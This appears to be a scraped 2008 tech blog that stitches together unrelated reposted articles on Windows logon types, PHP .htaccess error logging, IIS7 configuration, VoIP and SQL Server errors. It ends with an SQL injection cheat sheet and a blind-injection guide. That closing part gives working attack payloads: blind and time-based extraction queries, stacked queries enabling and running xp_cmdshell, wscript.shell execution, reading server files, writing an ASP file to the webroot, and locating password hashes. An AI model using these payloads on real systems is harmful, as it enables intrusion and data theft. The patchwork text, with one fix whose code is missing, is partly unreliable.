Logon Type 11 – CachedInteractive

Windows supports a feature called Cached Logons which facilitate mobile users. When you are not connected to the your organization's network and attempt to logon to your laptop with a domain account there's no domain controller available to the laptop with which to verify your identity. To solve this problem, Windows caches a hash of the credentials of the last 10 interactive domain logons. Later when no domain controller is available, Windows uses these hashes to verify your identity when you attempt to logon with a domain account.

Conclusion

I hope this discussion of logon types and their meanings helps you as you keep watch on your Windows network and try to piece together the different ways users are accessing your computers. Paying attention to logon type is important because different logon types can affect how you interpret logon events from a security perspective. For instance a failed network logon on a server might now be surprising since users must access servers over the network all the time. But a failed network logon attempt in a workstation security log is different. Why is anyone trying to access someone else's workstation from over the network? As you can see, it pays to understand the security log

الأحد، 2 نوفمبر 2008

How to log PHP Errors with .htaccess 2

Below is the development edition, this setup is ideal for sites that are not yet published to the public. This setup is ideal as it will catch & display errors in real time.

.htaccess file: Development Edition

***********************
# PHP error handling for production servers
php_flag display_startup_errors on
php_flag display_errors on
php_flag html_errors on
php_flag log_errors on
php_flag ignore_repeated_errors off
php_flag ignore_repeated_source off
php_flag report_memleaks on
php_flag track_errors on
php_value docref_root 0
php_value docref_ext 0
php_value error_log /home/path/public_html/domain/PHP_errors.log
php_value error_reporting 999999999
php_value log_errors_max_len 0
<Files /home/path/public_html/domain/PHP_errors.log>
Order allow,deny
Deny from all
Satisfy All
</Files>

*****************************

السبت، 1 نوفمبر 2008

How to log PHP Errors with .htaccess file

There is two scripts with appropriate comments to help you easily customize your PHP error log file.

There is a production edition which silences all errors and then there is a development edition which shows all errors in real time as thy occur in addition to the log file.
Below is a production edition which is ideal for a site that is active, live, etc. This edition will make sure that no errors are ever displayed on the live site but instead written to a specified log file.
.htaccess file: Production Edition
*****************
# disable display of startup errors
php_flag display_startup_errors off
# disable display of all other errors
php_flag display_errors off
# disable html markup of errors
php_flag html_errors off
# enable logging of errors
php_flag log_errors on
# disable ignoring of repeat errors
php_flag ignore_repeated_errors off
# disable ignoring of unique source errors
php_flag ignore_repeated_source off
# enable logging of php memory leaks
php_flag report_memleaks on
# preserve most recent error via php_errormsg
php_flag track_errors on
# disable formatting of error reference links
php_value docref_root 0
# disable formatting of error reference links
php_value docref_ext 0
# specify path to php error log
php_value error_log /home/path/public_html/domain/PHP_errors.log
# specify recording of all php errors
php_value error_reporting 999999999
# disable max error string length
php_value log_errors_max_len 0
# protect error log by preventing public access
<Files /home/path/public_html/domain/PHP_errors.log>
Order allow,deny
Deny from all
Satisfy All
</Files>

*************

الأحد، 26 أكتوبر 2008

How to Read Configuration Schema 2

Element Schema

Every element is defined in a corresponding <element> XML element in the schema. Elements can be nested. An element is simply a container for other attributes, or sub-elements. It must have a name and it may serve as a container of default values for collection elements (for example, siteDefaults holds the default values for sites in the <sites> collection).
<ELEMENT>
name="" [String, Required] [XML name of the element]
isCollectionDefault="false" [bool] [Indicates if default values are held for other elements in this collection]
/>

Collection Schema

Every collection is defined in a corresponding <collection> XML element in the schema. Collections contain multiple elements, which can be added and removed from it individually. Typically the collection directive names are "add", "remove" and "clear", but some collections use different names for clarity (for example, the collection is using "site" instead of "add"). This is done by specifying values for addElement, removeElement and clearElement in the collection schema. If a collection directive is missing from the schema, the collection will not support it. The collection schema may specify the name of a default element, that will be used as a container of default values for collection elements (this complements isCollectionDefault in the element schema).

For example, the collection is using siteDefaults as the default element. Most collections append elements as they merge configuration files down the namespace, but some may specify mergeAppend="false" in the schema to have a prepend behavior. For example, consider two levels of configuration: applicationHost.config and web.config in a site.

<myCollection>
<add value="1"/>
</myCollection>
In web.config:
<myCollection>
<add value="2"/>
</myCollection>

If the collection appends, its merged (effective) configuration at the site level will be:

<myCollection>
<add value="1"/>
<add value="2"/>
</myCollection>
However, if it prepends, it will be:
<myCollection>
<add value="2"/>
<add value="1"/>
</myCollection>

Some collections may allow duplicate entries by specifying allowDuplicates="true" in their schema. This is mostly done to support legacy collections in the .NET framework (in machine.config).

Some collections may allow additional attributes in them, beyond those specified in the schema. This is done by specifying allowUnrecognizedAttributes="true" in their schema. It is mostly done to support provider-based collections in the .NET framework.

How to Read Configuration Schema

Configuration schema file for IIS settings: %windir%\system32\inetsrv\config\schema\IIS_Schema.xml.

The schema for each configuration section is defined in an XML element. There is no schema definition for section groups. The following format is used here to explain how to read the schema:

<attribute-name>="<default-value>" [<metadata>] [<description>]

<attribute-name> is the name of the configuration attribute, as it appears in XML. Every attribute must have a name.

<default-value> is the value used by default, if no other value is specified in the XML for the attribute. Not all attributes have default values (for example, site name). In this case, the syntax will be "".

<metadata> contains several items:

  • The runtime type of the attribute. This is one of "bool", "enum", "flags", "int", "int64", "String", "timeSpan". Every attribute must have a type.
  • "bool" is "true" or "false".
  • "enum" is a set of possible values, where only one of them can be set for the attribute. Every such value has a numerical value and a friendly name. The syntax is using the character "|" as a delimiter between the friendly names: value1|value2|…|valueN.
  • "flags" is similar to "enum", except that combinations of values are allowed. Therefore the numerical values should be in multiples of 2, so they can be ORed together to form combinations. The syntax is identical to "enum": value1|value2|…|valueN.
  • "int" is a 32 bit integer.
  • "int64" is a 64 bit integer.
  • "String" is a character string.
  • "timeSpan" is a representation of a time unit, similar to the managed-code type TimeSpan. It can be persisted as a number (representing seconds, or minutes); or as a formatted string in the form of "[dd:]hh:mm:ss". The "[dd:]" element represents an optional number of days. The other elements represent numbers of hours, minutes and seconds, respectively. The "timeSpanFormat" attribute specifies which format should be used: number of seconds, number of minutes, or a formatted string.
  • Required attributes are marked "Required". It means that a value for them must be set in the XML. For example, site name is a required attribute (every site must have a name in IIS 7.0).
<description> is a short description of the attribute.

Section Schema

The <sectionSchema> XML element is the base unit of schema information. All other schema information is specified within it. It has one attribute directly in it ("name"), and then the rest of the schema is in sub-elements within it.

Attribute Schema

Every attribute is defined in a corresponding <attribute> XML element in the schema. The <attribute> element may be in the <sectionSchema> element directly (if the attribute is in the section scope); or in the element (if the attribute is in a sub-element within the section); or in the <collection> element (if the attribute is in a collection within the section).
An attribute schema must specify a name and a runtime type for the attribute. It may mark the attribute as required. It may mark the attribute as the unique key (if inside a collection), or as part of a collection key (together with other attributes). It may specify a default value for the attribute. It may mark the attribute for automatic encryption on-disk. It may specify if the word "Infinite" is allowed as a value for the attribute (only for numeric types such as int and in64, and for timeSpan). It may specify the timespan format (seconds, minutes or formatted string) for timespan attributes. It may specify validation rules for the attributes (see Attribute Validation section below in this document).
 <ATTRIBUTE
name="" [String, Required] [XML name of the attribute] type="" [bool|enum|flags|int|int64|string|timeSpan, Required][Runtime type]
required="false" [bool] [Indicates if must be set]
isUniqueKey="false" [bool] [Serves as the collection key]
isCombinedKey="false" [bool] [Part of a multi-attribute key]
defaultValue="" [String] [Default value or comma-delimited flags]
encrypted="false" [bool] [Indicates if value persisted is encrypted]
allowInfinite="false" [bool] [Indicates if "Infinite" can be set]
timeSpanFormat="string" [string|seconds|minutes] [hh:mm:ss or number]
validationType="" [See validation below]
validationParameter="" [See validation below]

/>

How to backup / restore IIS7 configuration

Backup/Restore via the command line
Backing up IIS7 configuration is as simple as copying the \windows\system32\inetsrv\config directory (and subdirectories) into a backup directory, so you don't need anything special to do it. Just include this directory in whatever your OS/content back-up plan is, or write a custom script to do it.
To help make managing backups easy, we've added a simple cmd-line option to AppCmd.exe that makes management of backup/restore sets easy. For example, to backup configuration, run the follow command:
> %windir%\system32\inetsrv\appcmd.exe add backup "My Backup Name"
to restore that backup, run this command:
> %windir%\system32\inetsrv\appcmd.exe restore backup "My Backup Name"
to delete a backup, run this command:
> %windir%\system32\inetsrv\appcmd.exe delete backup "My Backup Name"

Pretty easy, eh? Except for the dirty little secret everyone knows...remembering to do a backup! Thankfully, IIS7 comes to the rescue here. Thanks to a feature called IIS7 configuration history, IIS will automatically make history snapshots of ApplicationHost.config each time a change is detected, enabling you to easily restore to a prior version. By default, IIS checks for a new version every 2 mins, and will keep 10 prior versions of the file. IIS7 stores these snapshots in the %systemdrive%\inetpub\history folder by default. You can change any of these settings by editing the <system.applicationHost/configHistory> section in ApplicationHost.config.

IMPORTANT NOTE: This feature only appears in Windows Server 2008 and Vista SP1. It is not in original release version of Vista , as it was not yet finished when Vista first shipped. This is one of the thousands of changes that was made to IIS7 after Vista RTM, and is one of many reasons you should install SP1 as soon as possible!
How do you restore a prior snapshot? Well, you could just go to the \inetpub\history\cfgHistory_NNNNNNNNNN directory and copy the applicationHost.config file into it's proper place: \windows\sytem32\inetsrv\config. Or you can use the same command as above for restoring a backup to restore a configuration history file.
To enumerate a list of backups and configuration history files, use the following command:
> %windir%\system32\inetsrv\appcmd.exe list backup

الجمعة، 24 أكتوبر 2008

How To Choose The Best Voip Provider For Your International Calling Needs

Broadband phone service is so popular because it's cheap - this is why millions of people are disconnecting their traditional land-line service in favor of VoIP (this is the technical term for internet phone service). Once you decide to switch to internet phone service, you'll need to decide on the best VoIP provider for your domestic and international calling needs. There are three main things to consider when choosing a VoIP provider for local and international calling:
1 - The reputation of the VoIP company
2- Does the VoIP provider have the right plan for your needs?
3 - International long distance rate to your particular destination/s
 
Finding the Best VoIP Providers
The first step in choosing a broadband phone service provider is narrowing down the field of choices to only the best VoIP companies. There are several VoIP providers to choose from, including your local cable company.
Telephone service is very important, and it's extremely important that the VoIP provider you choose provides a high level of reliability and excellent call quality. You also want to be sure that the VoIP company you choose offers excellent and fast technical support. When you switch from dependable (but expensive) land line phone service to internet phone service, the last thing you want is to have problems making or receiving calls - so it's important to choose only a highly-rated broadband phone company!
 
Cable Company VoIP
Your local cable company probably offers internet phone service too, and they should also be considered when choosing the best VoIP provider for your particular needs. Although digital phone service (this is what the cable companies call VoIP - it's still internet phone service) is known to be very reliable, the disadvantage is that it usually costs twice as much! Cable companies usually purchase VoIP service from a true VoIP provider and resell it to you. Because they have to make a profit, they have to charge you more. You can get the same high-quality digital phone service directly from a VoIP company for about 50% less than the cable company charges!
 
Deciding What Type of VoIP Plan You Need
Do you typically make a lot of phone calls? Do you want to be able to keep in touch with friends and loved ones who live far away? Do you want the luxury of being able to talk long distance for hours at a time for free? How many minutes a month are spent making international calls? When calling internationally, which countries do you call? These are questions you should ask yourself before comparing VoIP providers, as your answers define what you really need out of VoIP service.
If you want to make all the local and long distance calls you want within the US, Canada and Puerto Rico, consider getting an unlimited plan. Although this won't give you free international calls, international long distance rates are really cheap with internet phone service. For the absolute best value with an unlimited calling plan, choose an annual plan. With this type of plan, you pay for a whole year of service up front (usually around $200) and get a great price break!
If you want to make free unlimited international calls, consider getting an unlimited international calling plan. Although a bit more expensive than a domestic unlimited calling plan, this will allow you to talk to overseas family and colleagues without incurring any international long distance charges.
If you don't make many calls, your best bet may be to get a limited monthly VoIP plan and then"pay as you go" for international long distance calls. This will be about half the cost of an unlimited plan, and you'll get a set number of monthly minutes.
 
Compare International Long Distance Rates
International long distance calling rates are so low with VoIP that you'll be pleasantly surprised at how much you can talk for so little money! Rates vary among VoIP companies though, so be sure to compare each provider's international rate for the countries you call before deciding on the best VoIP provider for your needs.



Invite your mail contacts to join your friends list with Windows Live Spaces. It's easy! Try it!

السبت، 27 سبتمبر 2008

Error: (provider: SQL Network Interfaces, error: 26 - Error Locating Server/Instance Specified)

A network-related or instance-specific error occurred while establishing a connection to SQL Server. The server was not found or was not accessible. Verify that the instance name is correct and that SQL Server is configured to allow remote connections. (provider: SQL Network Interfaces, error: 26 - Error Locating Server/Instance Specified)

How to fix SQL Network Interfaces, error: 26?

First of all, you get this error message only if you are trying to connect to a SQL Server named instance. For default instance, you never see this. Why? Because even if we failed at this stage (i.e. error locating server/instance specified), we will continue to try connect using default values, e.g defaul TCP port 1433, default pipe name for Named Pipes. You may see other error message due to failure later, but not this error message.

Every time client makes a connection to SQL Server named instance, we will send a SSRP UDP packet to the server machine UDP port 1434. We need this step to know configuration information of the SQL instance, e.g., protocols enabled, TCP port, pipe name etc. Without these information, client does know how to connect the server and it fails with this specified error message.

In a word, the reason that we get this error message is the client stack could not receive SSRP response UDP packet from SQL Browser. It's easy to isolate the issue. Here are the steps:
1) Make sure your server name is correct, e.g., no typo on the name.
2) Make sure your instance name is correct and there is actually such an instance on your target machine. [Update: Some application converts \\ to \. If you are not sure about your application, please try both Server\Instance and Server\\Instance in your connection string]
3) Make sure the server machine is reachable, e.g, DNS can be resolve correctly, you are able to ping the server (not always true).
4) Make sure SQL Browser service is running on the server.
5) If firewall is enabled on the server, you need to put sqlbrowser.exe and/or UDP port 1434 into exception.

Once you are done the steps, you should not see this error message anymore. You may still fail to connect your SQL server, but error message should be different and you have a different issue now. [Update: If it still fails, you may replace server\instance with tcp:server\instance and/or np:server\instance and see if it succeeds with either TCP or NP protocol. That way, you can isolate the issue a little bit. ]

الجمعة، 26 سبتمبر 2008

Error : "Validation of ViewState Mac failed" with ASP.NET 2.0

Validation of viewstate MAC failed. If this application is hosted by a Web Farm or cluster, ensure that configuration specifies the same validationKey and validation algorithm. AutoGenerate cannot be used in a cluster.

To fix it, add the below given code into your web.config or
the file that you are executing and see if your issue gets fixed.

"

"



السبت، 6 سبتمبر 2008

Blind SQL Injections

About Blind SQL Injections

In a quite good production application generally you can not see error responses on the page, so you can not extract data through Union attacks or error based attacks. You have to do use Blind SQL Injections attacks to extract data. There are two kind of Blind Sql Injections.

Normal Blind, You can not see a response in the page but you can still determine result of a query from response or HTTP status code
Totally Blind, You can not see any difference in the output in any kind. This can be an injection a logging function or similar. Not so common though.

In normal blinds you can use if statements or abuse WHERE query in injection (generally easier), in totally blinds you need to use some waiting functions and analyze response times. For this you can use WAIT FOR DELAY '0:0:10' in SQL Server, BENCHMARK() in MySQL, pg_sleep(10) in PostgreSQL, and some PL/SQL tricks in ORACLE.

Real and a bit Complex Blind SQL Injection Attack Sample

This output taken from a real private Blind SQL Injection tool while exploiting SQL Server back ended application and enumerating table names. This requests done for first char of the first table name. SQL queries a bit more complex then requirement because of automation reasons. In we are trying to determine an ascii value of a char via binary search algorithm.

TRUE and FALSE flags mark queries returned true or false.

TRUE : SELECT ID, Username, Email FROM [User]WHERE ID = 1 AND ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 0 name FROM sysObjects WHERE xtYpe=0x55)),1,1)),0)>78--

FALSE : SELECT ID, Username, Email FROM [User]WHERE ID = 1 AND ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 0 name FROM sysObjects WHERE xtYpe=0x55)),1,1)),0)>103--

TRUE : SELECT ID, Username, Email FROM [User]WHERE ID = 1 AND ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 0 name FROM sysObjects WHERE xtYpe=0x55)),1,1)),0)<103--

FALSE : SELECT ID, Username, Email FROM [User]WHERE ID = 1 AND ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 0 name FROM sysObjects WHERE xtYpe=0x55)),1,1)),0)>89--

TRUE : SELECT ID, Username, Email FROM [User]WHERE ID = 1 AND ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 0 name FROM sysObjects WHERE xtYpe=0x55)),1,1)),0)<89--

FALSE : SELECT ID, Username, Email FROM [User]WHERE ID = 1 AND ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 0 name FROM sysObjects WHERE xtYpe=0x55)),1,1)),0)>83--

TRUE : SELECT ID, Username, Email FROM [User]WHERE ID = 1 AND ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 0 name FROM sysObjects WHERE xtYpe=0x55)),1,1)),0)<83--

FALSE : SELECT ID, Username, Email FROM [User]WHERE ID = 1 AND ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 0 name FROM sysObjects WHERE xtYpe=0x55)),1,1)),0)>80--

FALSE : SELECT ID, Username, Email FROM [User]WHERE ID = 1 AND ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 0 name FROM sysObjects WHERE xtYpe=0x55)),1,1)),0)<80--

Since both of the last 2 queries failed we clearly know table name's first char's ascii value is 80 which means first char is `P`. This is the way to exploit Blind SQL injections by binary search algorithm. Other well known way is reading data bit by bit. Both can be effective in different conditions.

Waiting For Blind SQL Injections

First of all use this if it's really blind, otherwise just use 1/0 style errors to identify difference. Second, be careful while using times more than 20-30 seconds. database API connection or script can be timeout.

WAIT FOR DELAY 'time' (S)

This is just like sleep, wait for spesified time. CPU safe way to make database wait.
WAITFOR DELAY '0:0:10'--
Also you can use fractions like this,
WAITFOR DELAY '0:0:0.51'

Real World Samples

  • Are we 'sa' ?
    if (select user) = 'sa' waitfor delay '0:0:10'
  • ProductID = 1;waitfor delay '0:0:10'--
  • ProductID =1);waitfor delay '0:0:10'--
  • ProductID =1';waitfor delay '0:0:10'--
  • ProductID =1');waitfor delay '0:0:10'--
  • ProductID =1));waitfor delay '0:0:10'--
  • ProductID =1'));waitfor delay '0:0:10'--

BENCHMARK() (M)

Basically we are abusing this command to make MySQL wait a bit. Be careful you will consume web servers limit so fast!
BENCHMARK(howmanytimes, do this)

Real World Samples

  • Are we root ? woot!
    IF EXISTS (SELECT * FROM users WHERE username = 'root') BENCHMARK(1000000000,MD5(1))

  • Check Table exist in MySQL
    IF (SELECT * FROM login) BENCHMARK(1000000,MD5(1))

pg_sleep(seconds) (P)

Sleep for supplied seconds.

  • SELECT pg_sleep(10);
    Sleep 10 seconds.

SQL Injection Cheat Sheet 3

SQL Injection Cheat Sheet :

Bulk Insert (S)

Insert a file content to a table. If you don't know internal path of web application you can read IIS (IIS 6 only) metabase file (%systemroot%\system32\inetsrv\MetaBase.xml) and then search in it to identify application path.
    1. Create table foo( line varchar(8000) )
    2. bulk insert foo from 'c:\inetpub\wwwroot\login.asp'
    3. Drop temp table, and repeat for another file.

BCP (S)

Write text file. Login Credentials are required to use this function.
bcp "SELECT * FROM test..foo" queryout c:\inetpub\wwwroot\runcommand.asp -c -Slocalhost -Usa -Pfoobar

VBS, WSH in SQL Server (S)

You can use VBS, WSH scripting in SQL Server because of ActiveX support.
declare @o int
exec sp_oacreate 'wscript.shell', @o out
exec sp_oamethod @o, 'run', NULL, 'notepad.exe'
Username: '; declare @o int exec sp_oacreate 'wscript.shell', @o out exec sp_oamethod @o, 'run', NULL, 'notepad.exe' --

Executing system commands, xp_cmdshell (S)

Well known trick, By default it's disabled in SQL Server 2005. You need to have admin access.
EXEC master.dbo.xp_cmdshell 'cmd.exe dir c:'

Simple ping check (configure your firewall or sniffer to identify request before launch it),
EXEC master.dbo.xp_cmdshell 'ping <ip address>'
You can not read results directly from error or union or something else.

Some Special Tables in SQL Server (S)

  • Error Messages
    master..sysmessages

  • Linked Servers
    master..sysservers

  • Password (2000 and 20005 both can be crackable, they use very similar hashing algorithm )
    SQL Server 2000: masters..sysxlogins
    SQL Server 2005 : sys.sql_logins

More Stored Procedures for SQL Server (S)

  1. Cmd Execute (xp_cmdshell)
    exec master..xp_cmdshell 'dir'

  2. Registry Stuff (xp_regread)
    1. xp_regaddmultistring
    2. xp_regdeletekey
    3. xp_regdeletevalue
    4. xp_regenumkeys
    5. xp_regenumvalues
    6. xp_regread
    7. xp_regremovemultistring
    8. xp_regwrite
      exec xp_regread HKEY_LOCAL_MACHINE, 'SYSTEM\CurrentControlSet\Services\lanmanserver\parameters', 'nullsessionshares'
      exec xp_regenumvalues HKEY_LOCAL_MACHINE, 'SYSTEM\CurrentControlSet\Services\snmp\parameters\validcommunities'

  3. Managing Services (xp_servicecontrol)
  4. Medias (xp_availablemedia)
  5. ODBC Resources (xp_enumdsn)
  6. Login mode (xp_loginconfig)
  7. Creating Cab Files (xp_makecab)
  8. Domain Enumeration (xp_ntsec_enumdomains)
  9. Process Killing (need PID) (xp_terminate_process)
  10. Add new procedure (virtually you can execute whatever you want)
    sp_addextendedproc 'xp_webserver', 'c:\temp\x.dll'
    exec xp_webserver
  11. Write text file to a UNC or an internal path (sp_makewebtask)

MSSQL Bulk Notes

SELECT * FROM master..sysprocesses /*WHERE spid=@@SPID*/
DECLARE @result int; EXEC @result = xp_cmdshell 'dir *.exe';IF (@result = 0) SELECT 0 ELSE SELECT 1/0
HOST_NAME()
IS_MEMBER (Transact-SQL)
IS_SRVROLEMEMBER (Transact-SQL)
OPENDATASOURCE (Transact-SQL)
INSERT tbl EXEC master..xp_cmdshell OSQL /Q"DBCC SHOWCONTIG"
OPENROWSET (Transact-SQL) - http://msdn2.microsoft.com/en-us/library/ms190312.aspx
You can not use sub selects in SQL Server Insert queries.

SQL Injection in LIMIT (M) or ORDER (MSO)

SELECT id, product FROM test.test t LIMIT 0,0 UNION ALL SELECT 1,'x'/*,10 ;
If injection is in second limit you can comment it out or use in your union injection

Shutdown SQL Server (S)

When you really pissed off, ';shutdown --

Enabling xp_cmdshell in SQL Server 2005

By default xp_cmdshell and couple of other potentially dangerous stored procedures are disabled in SQL Server 2005. If you have admin access then you can enable these.

EXEC sp_configure 'show advanced options',1
RECONFIGURE

EXEC sp_configure 'xp_cmdshell',1
RECONFIGURE

Finding Database Structure in SQL Server (S)

Getting User defined Tables

SELECT name FROM sysobjects WHERE xtype = 'U'

Getting Column Names

SELECT name FROM syscolumns WHERE id =(SELECT id FROM sysobjects WHERE name = 'tablenameforcolumnnames')

Moving records (S)

  • Modify WHERE and use NOT IN or NOT EXIST,
    ... WHERE users NOT IN ('First User', 'Second User')
    SELECT TOP 1 name FROM members WHERE NOT EXIST(SELECT TOP 0 name FROM members) -- very good one

  • Using Dirty Tricks
    SELECT * FROM Product WHERE ID=2 AND 1=CAST((Select p.name from (SELECT (SELECT COUNT(i.id) AS rid FROM sysobjects i WHERE i.id<=o.id) AS x, name from sysobjects o) as p where p.x=3) as int

    Select p.name from (SELECT (SELECT COUNT(i.id) AS rid FROM sysobjects i WHERE xtype='U' and i.id<=o.id) AS x, name from sysobjects o WHERE o.xtype = 'U') as p where p.x=21


Fast way to extract data from Error Based SQL Injections in SQL Server (S)

';BEGIN DECLARE @rt varchar(8000) SET @rd=':' SELECT @rd=@rd+' '+name FROM syscolumns WHERE id =(SELECT id FROM sysobjects WHERE name = 'MEMBERS') AND name>@rd SELECT @rd AS rd into TMP_SYS_TMP end;--